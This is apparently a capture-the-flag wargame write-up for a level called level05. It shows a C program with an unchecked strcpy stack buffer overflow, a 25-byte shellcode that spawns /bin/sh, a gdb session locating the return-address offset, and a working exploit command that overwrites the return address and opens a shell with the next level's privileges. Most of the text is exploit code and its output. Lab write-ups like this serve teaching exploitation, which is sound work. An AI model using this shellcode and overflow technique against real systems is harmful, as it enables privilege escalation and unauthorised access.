#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[128];

    if(argc < 2) return 1;
    strcpy(buf, argv[1]);
    printf("%s\n", buf);
    return 0;
}
Just a plain BOF (buffer overflow).
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e
\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
25 bytes, system("/bin/sh");
(gdb) r `python -c 'print "\x90" * 140 + "DDDD"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /levels/level05 `python -c 'print "\x90" * 140 + "DDDD"'`
DDDD
Program received signal SIGSEGV, Segmentation fault.
0x44444444 in ?? ()
0xbffffdfc: 0x90909000 0x90909090 0x90909090 0x90909090
0xbffffe0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe5c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffe7c: 0x90909090 0x90909090 0x90909090 0x44444490
level5@io:/levels$ ./level05 $(python -c 'print "\x90" * 115 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" + "\x11\xfe\xff\xbf"')
sh-4.2$ whoami
level6
sh-4.2$ id
uid=1005(level5) gid=1005(level5) euid=1006(level6) groups=1006(level6),1005(level5)